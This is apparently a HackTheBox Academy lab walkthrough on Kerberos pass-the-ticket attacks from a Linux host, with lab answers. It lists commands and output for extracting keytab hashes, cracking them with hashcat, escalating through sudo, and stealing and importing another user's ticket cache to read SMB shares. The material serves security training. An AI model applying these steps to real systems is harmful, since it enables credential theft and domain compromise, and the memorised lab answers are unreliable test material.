Pass the Ticket (PtT) from Linux
ℹ️ Informations¶
- 🌐 Website: HackTheBox
- 📚 Module: Password Attacks
- 🔗 Link: Pass the Ticket (PtT) from Linux
❓Question¶
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory.
📋 Walkthrough¶
Login using user "david@inlanefreight.htb" and password "Password2"
Answer
Gett1ng_Acc3$$_to_LINUX01
❓Question¶
Which group can connect to LINUX01?
📋 Walkthrough¶
To find out which group can connect to LINUX01, use the realm list command:
$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
Answer
Linux Admins
❓Question¶
Look for a keytab file that you have read and write access. Submit the file name as a response.
📋 Walkthrough¶
To find keytab files, use the find command:
Answer
carlos.keytab
❓Question¶
Extract the hashes from the keytab file you found, crack the password, log in as the user and submit the flag in the user's home directory.
📋 Walkthrough¶
Extract the keytab using keytabextract.py:
david@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
Now crack the password with hash a738f92b3c08b424ec2d99589a9cce60:
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ echo "a738f92b3c08b424ec2d99589a9cce60" > hash
┌──(kali㉿kali)-[~/Desktop/HTB/Academy]
└─$ hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
<SNIP>
a738f92b3c08b424ec2d99589a9cce60:Pa*******
Login as carlos@inlanefreight.htb:
david@inlanefreight.htb@linux01:~$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ ls
flag.txt script-test-results.txt
carlos@inlanefreight.htb@linux01:~$ cat flag.txt
C@rl0s******
Answer
C@rl0s******
❓Question¶
Check Carlos' crontab, and look for keytabs to which Carlos has access. Try to get the credentials of the user svc_workstations and use them to authenticate via SSH. Submit the flag.txt in svc_workstations' home directory.
📋 Walkthrough¶
Check crontab:
# m h dom mon dow command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
Check the script:
carlos@inlanefreight.htb@linux01:~$ cat .scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
Check the keytab:
carlos@inlanefreight.htb@linux01:~$ klist -k -t .scripts/svc_workstations.kt
Keytab name: FILE:.scripts/svc_workstations.kt
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 03/15/2025 16:00:01 svc_workstations@INLANEFREIGHT.HTB
If the keytab is incorrect, check for another keytab:
carlos@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py .scripts/svc_workstations._all.kt
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : svc_workstations/
NTLM HASH : 7247e8d4387e76996ff3f18a34316fdd
AES-256 HASH : 0c91040d4d05092a3d545bbf76237b3794c456ac42c8d577753d64283889da6d
AES-128 HASH : 3a7e52143531408f39101187acc80677
Crack the password:
Login as svc_workstations:
carlos@inlanefreight.htb@linux01:~$ su svc_workstations@inlanefreight.htb
Password:
svc_workstations@inlanefreight.htb@linux01:/home/carlos@inlanefreight.htb$ cd ~
svc_workstations@inlanefreight.htb@linux01:~$ ls
flag.txt
svc_workstations@inlanefreight.htb@linux01:~$ cat flag.txt
Mor3_4cce$$_***********
Answer
Mor3_4cce$$_m0r3_Pr1v$
❓Question¶
Check the sudo privileges of the svc_workstations user and get access as root. Submit the flag in /root/flag.txt directory as the response.
📋 Walkthrough¶
Check sudo privileges:
svc_workstations@inlanefreight.htb@linux01:~$ sudo -l
[sudo] password for svc_workstations@inlanefreight.htb:
Matching Defaults entries for svc_workstations@inlanefreight.htb on
linux01:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User svc_workstations@inlanefreight.htb may run the following commands
on linux01:
(ALL) ALL
Run command as root:
Answer
Ro0t_********
❓Question¶
Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \\DC01\julio.
📋 Walkthrough¶
List Kerberos tickets in /tmp:
svc_workstations@inlanefreight.htb@linux01:/tmp$ ls | grep krb
krb5cc_647401106_HRJDux
krb5cc_647401106_Uib3BQ
krb5cc_647401107_tSR6gp
krb5cc_647401109_6rDqRC
krb5cc_647402606
krb5cc_647402606_Ak5Zno
Identify Julio's ticket:
svc_workstations@inlanefreight.htb@linux01:/tmp$ ls -la | grep krb5
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1414 Mar 15 16:30 krb5cc_647401106_HKY8fO
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Mar 15 16:30 krb5cc_647401106_HRJDux
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Mar 15 15:40 krb5cc_647401107_tSR6gp
-rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Mar 15 16:18 krb5cc_647401109_6rDqRC
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1746 Mar 15 16:30 krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1746 Mar 15 16:13 krb5cc_647402606_Ak5Zno
Copy and import Julio's ticket:
svc_workstations@inlanefreight.htb@linux01:/tmp$ sudo su
root@linux01:/tmp# cp /tmp/krb5cc_647401106_HKY8fO /root
root@linux01:/tmp# cd ~
root@linux01:~# ls
flag.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_HKY8fO
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HKY8fO
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
03/15/2025 16:31:03 03/16/2025 02:31:03 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 03/16/2025 16:31:03
Access the domain share folder:
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass
$Recycle.Bin DHS 0 Wed Oct 6 17:31:14 2021
Config.Msi DHS 0 Wed Oct 6 14:26:27 2021
Documents and Settings DHSrn 0 Wed Oct 6 20:38:04 2021
john D 0 Mon Jul 18 13:19:50 2022
julio D 0 Mon Jul 18 13:54:02 2022
pagefile.sys AHS 738197504 Sat Mar 15 15:39:13 2025
PerfLogs D 0 Fri Feb 25 16:20:48 2022
Program Files DR 0 Wed Oct 6 20:50:50 2021
Program Files (x86) D 0 Mon Jul 18 16:00:35 2022
ProgramData DHn 0 Fri Aug 19 12:18:42 2022
SharedFolder D 0 Thu Oct 6 14:46:20 2022
System Volume Information DHS 0 Wed Jul 13 19:01:52 2022
tools D 0 Thu Sep 22 18:19:04 2022
Users DR 0 Thu Oct 6 11:46:05 2022
Windows D 0 Mon Oct 10 10:48:55 2022
7706623 blocks of size 4096. 4459828 blocks available
Access Julio's folder:
root@linux01:~# smbclient //dc01/julio -k
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 14 12:25:24 2022
.. D 0 Thu Jul 14 12:25:24 2022
julio.txt A 17 Thu Jul 14 21:18:12 2022
7706623 blocks of size 4096. 4459700 blocks available
smb: \> get julio.txt
getting file \julio.txt of size 17 as julio.txt (16.6 KiloBytes/sec) (average 16.6 KiloBytes/sec)
smb: \> exit
root@linux01:~# ls
flag.txt julio.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# cat julio.txt
JuL1()_SH@*****
Answer
JuL1()_SH@*****
❓Question¶
Use the LINUX01$ Kerberos ticket to read the flag found in \\DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
📋 Walkthrough¶
Check for the keytab in /etc/krb5.keytab:
root@linux01:~# klist -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Principal
---- --------------------------------------------------------------------------
2 LINUX01$@INLANEFREIGHT.HTB
2 LINUX01$@INLANEFREIGHT.HTB
2 LINUX01$@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/LINUX01@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
2 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 LINUX01$@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/LINUX01@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 host/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/LINUX01@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
3 RestrictedKrbHost/linux01.inlanefreight.htb@INLANEFREIGHT.HTB
Initialize the Kerberos ticket:
root@linux01:~# kinit LINUX01$ -k -t /etc/krb5.keytab
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_HKY8fO
Default principal: LINUX01$@INLANEFREIGHT.HTB
Valid starting Expires Service principal
03/15/2025 17:05:32 03/16/2025 03:05:32 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 03/16/2025 17:05:32
Access the share folder:
root@linux01:~# smbclient //dc01/linux01 -k
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Oct 5 14:17:02 2022
.. D 0 Wed Oct 5 14:17:02 2022
flag.txt A 52 Wed Oct 5 14:17:02 2022
7706623 blocks of size 4096. 4459818 blocks available
smb: \> get flag.txt
getting file \flag.txt of size 52 as flag.txt (25.4 KiloBytes/sec) (average 25.4 KiloBytes/sec)
smb: \> exit
root@linux01:~# ls
flag.txt julio.txt krb5cc_647401106_HKY8fO snap
root@linux01:~# cat flag.txt
Us1nG_*************
Answer
Us1nG_*************